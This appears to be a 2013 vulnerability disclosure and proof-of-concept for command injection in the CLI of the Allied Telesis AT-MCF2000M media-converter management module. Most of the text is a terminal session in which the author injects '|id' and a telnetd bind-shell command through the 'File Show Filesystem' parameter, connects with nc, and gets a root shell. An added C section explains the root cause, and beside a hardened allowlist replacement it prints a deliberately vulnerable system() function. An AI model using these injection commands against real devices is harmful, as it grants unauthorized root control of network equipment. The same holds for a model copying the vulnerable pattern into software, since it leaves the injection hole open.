[ Discovered by dun \ posdub[at]gmail.com ] [ 2013-01-02 ]

####################################################################
#[ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access#
####################################################################
#
# Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis.
# With the AT-MCF2000M management module, if there is a blade failure,
# insertion or removal, your traffic flow will not be interrupted.."
#
# Vendor: http://www.alliedtelesis.com/
# Product: http://www.alliedtelesis.com/p-2265.html
# Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP
#
###################################################################
# Vulnerability:

Logging in to the system via ssh/telnet is necessary to use this vulnerability. After logging in, the user has access to the client menu (/sbin/AtiCli) without access to the shell. User-supplied data is not validated properly. In the section "File Show Filesystem=system://0/m/", it is possible to inject a command using the special characters ", |, ; and &. Commands are limited to a maximum of 25 characters. The character / is filtered. For example:

# File Show Filesystem=system://0/m/";echo 11111111111111111111"

The file name can only be up to 25 alphanumeric characters, so this is denied:

<>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]

# File Show Filesystem=system://0/m/";ls -al /"
<>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002]

Getting root access:

root@debian:~# ssh 10.11.200.2
--------------------------------------------------------------------------------
Allied Telesis Media Converter AT-MCF2000
--------------------------------------------------------------------------------
Login: manager
Password: *******

Allied Telesis Media Converter - Version 3.0.2
<No System Name>
# ?
COnfiguration - Configuration related commands
DIagnostics   - Diagnostics related commands
File          - File related commands
IP            - IP related commands
Logging       - Logging related commands
Ntp           - Ntp related commands
Ping          - Ping a host
System        - System related commands
Telnet        - Telnet related commands
SNMP          - Snmp related commands
SSh           - SSH related commands
User          - User management commands
CLear         - Clear the terminal screen
Help          - CLI help information
EXit          - Exit
# File Show Filesystem=system://0/m/
Module 0/M File System:
-rw-r--r--    1 0        0            2640 Jan  1 15:27 BM_0_1.cfg
-rw-r--r--    1 0        0            2612 Jan  1 15:27 BM_0_2.cfg
-rw-r--r--    1 0        0            1355 Jan  1 15:27 MM.cfg
-rw-r--r--    1 0        0             310 Dec 31 13:17 file.inf
-rw-r--r--    1 0        0            6609 Jan  1 15:27 mcf_chassis0.cfg
# File Show Filesystem=system://0/m/BM_0_1.cfg
Module 0/M File System:
-rw-r--r--    1 0        0            2640 Jan  1 15:27 BM_0_1.cfg
# File Show Filesystem=system://0/m/test
Module 0/M File System:
ls: test: No such file or directory
<>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]
# File Show Filesystem=system://0/m/|id
Module 0/M File System:
uid=0 gid=0
# File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"
Module 0/M File System:
<>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061]
# File Show Filesystem=system://0/m/|"ps aux|grep telnet"
Module 0/M File System:
   25 0          336 S   /usr/sbin/telnetd -l /sbin/AtiCli
  497 0          192 S   telnetd -l/bin/sh -p30
<>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117]
# exit
<>19:01:40::exit::COMPL::[00.001]
# logging out.
Connection to 10.11.200.2 closed.
root@debian:~# nc 10.11.200.2 30

BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # id
uid=0 gid=0
/ # uname -a
Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown
/ # cat /proc/version
Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009
/ # ls -al
drwxr-xr-x   15 1046     1002         1024 Jan  1 18:58 .
drwxr-xr-x   15 1046     1002         1024 Jan  1 18:58 ..
-rw-r--r--    1 0        0             125 Jan  1 19:10 .ash_history
-rw-r--r--    1 0        0               0 Jan  1 13:24 1
drwxr-xr-x    2 0        0            1024 Aug 10  2009 bin
drwxr-xr-x    3 0        0               0 Jan  1 15:27 cfg
drwxr-xr-x    4 0        0            2048 Aug 10  2009 dev
drwxr-xr-x   10 0        0            1024 Jan  1  1970 etc
drwxr-xr-x    4 0        0            1024 Aug 10  2009 lib
drwxr-xr-x    2 0        0           12288 Aug 10  2009 lost+found
drwxr-xr-x    3 0        0            1024 Aug 10  2009 mnt
dr-xr-xr-x   49 0        0               0 Jan  1  1970 proc
drwx------    2 0        0            1024 Aug 10  2009 root
drwxr-xr-x    2 0        0            1024 Aug 10  2009 sbin
drwxrwxrwt    2 0        0            1024 Jan  1 19:06 tmp
drwxr-xr-x    6 0        0            1024 Aug 10  2009 usr
drwxr-xr-x    7 0        0            1024 Jan  1  1970 var
/ # echo pwnd! :) & exit
pwnd! :)
Connection closed by foreign host.
root@debian:~#
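The root cause the advisory describes is a file name that is concatenated into a command line and handed to a shell, so that |, ;, & or a stray quote turns the name into a second command that runs with the CLI's root privileges. The C block below is an added example, not Allied Telesis code: it shows that pattern beside a hardened replacement, an allowlist validator that enforces the advisory's stated policy (at most 25 characters; letters, digits and the `.`, `_`, `-` seen in the listed file names are assumed to be the permitted set) and a listing that runs ls through execv with the name as a single argv element so no shell ever parses it. The base directory `/cfg` and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_NAME 25   /* length limit the advisory reports for file names */

/* Allowlist check: 1..25 chars from [A-Za-z0-9._-]; "." and ".." are
   refused so the name cannot leave the module file system. Shell
   metacharacters such as ", |, ; and & never pass. */
int file_name_ok(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > MAX_NAME) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Vulnerable pattern the advisory describes: user text is pasted into a
   command line and given to a shell, so "|id" in the name runs id as root.
   Shown for contrast only; nothing here calls it. */
void vulnerable_show(const char *name) {
    char cmd[128];
    snprintf(cmd, sizeof cmd, "ls -al /cfg/%s", name); /* /cfg is assumed */
    system(cmd);
}

/* Hardened replacement: validate first, then execv ls with the path as a
   single argv element. Returns -1 on DENY, else the exit status of ls. */
int safe_show(const char *base_dir, const char *name) {
    if (!file_name_ok(name)) return -1;              /* CLI_INVALID_PARAMETER */
    char path[64];
    if (snprintf(path, sizeof path, "%s/%s", base_dir, name) >= (int)sizeof path)
        return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"ls", "-al", "--", path, NULL};
        execv("/bin/ls", argv);
        _exit(127);                                  /* exec failed */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```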